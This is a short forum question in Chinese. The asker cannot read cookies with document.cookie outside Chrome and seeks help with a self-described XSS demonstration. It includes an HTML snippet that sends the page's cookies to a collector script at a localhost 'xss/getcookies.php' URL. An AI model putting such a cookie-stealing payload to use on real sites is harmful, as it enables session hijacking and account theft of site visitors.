我必须使用 JavaScript 读取 cookie。我正在使用document.cookie来做同样的事情。但该方法仅适用于 Google Chrome,不适用于 Firefox 和 IE 8/9。所有网页也显示document.cookie为一种方法。
如何使用 JavaScript 在 Firefox 和 IE 中获取 cookie?
谢谢
更新 我在本地主机上测试了我的代码。在blogspot.com上在线测试代码时,它甚至无法在 chrome 上运行。
无论如何,这是HTML代码:
<script type="text/javascript">
function sendCookies(){
document.location='http://localhost/xss/getcookies.php?cookie='+escape(document.cookie);
}
</script>
<a onclick="sendCookies()" href="#">
click here </a> to know about XSS attack.
在浏览器中调试document.cookie时,它仅在 Chrome 中显示值。如果我将 localhost 链接替换为在线链接,document.cookie则即使在 Chrome 上也是空的。
你可能的猜测是正确的。这是一种跨站点脚本攻击。
有关此代码的任何帮助对我有用吗?
更新 2:
这是演示如何执行 XSS 攻击的视频的链接: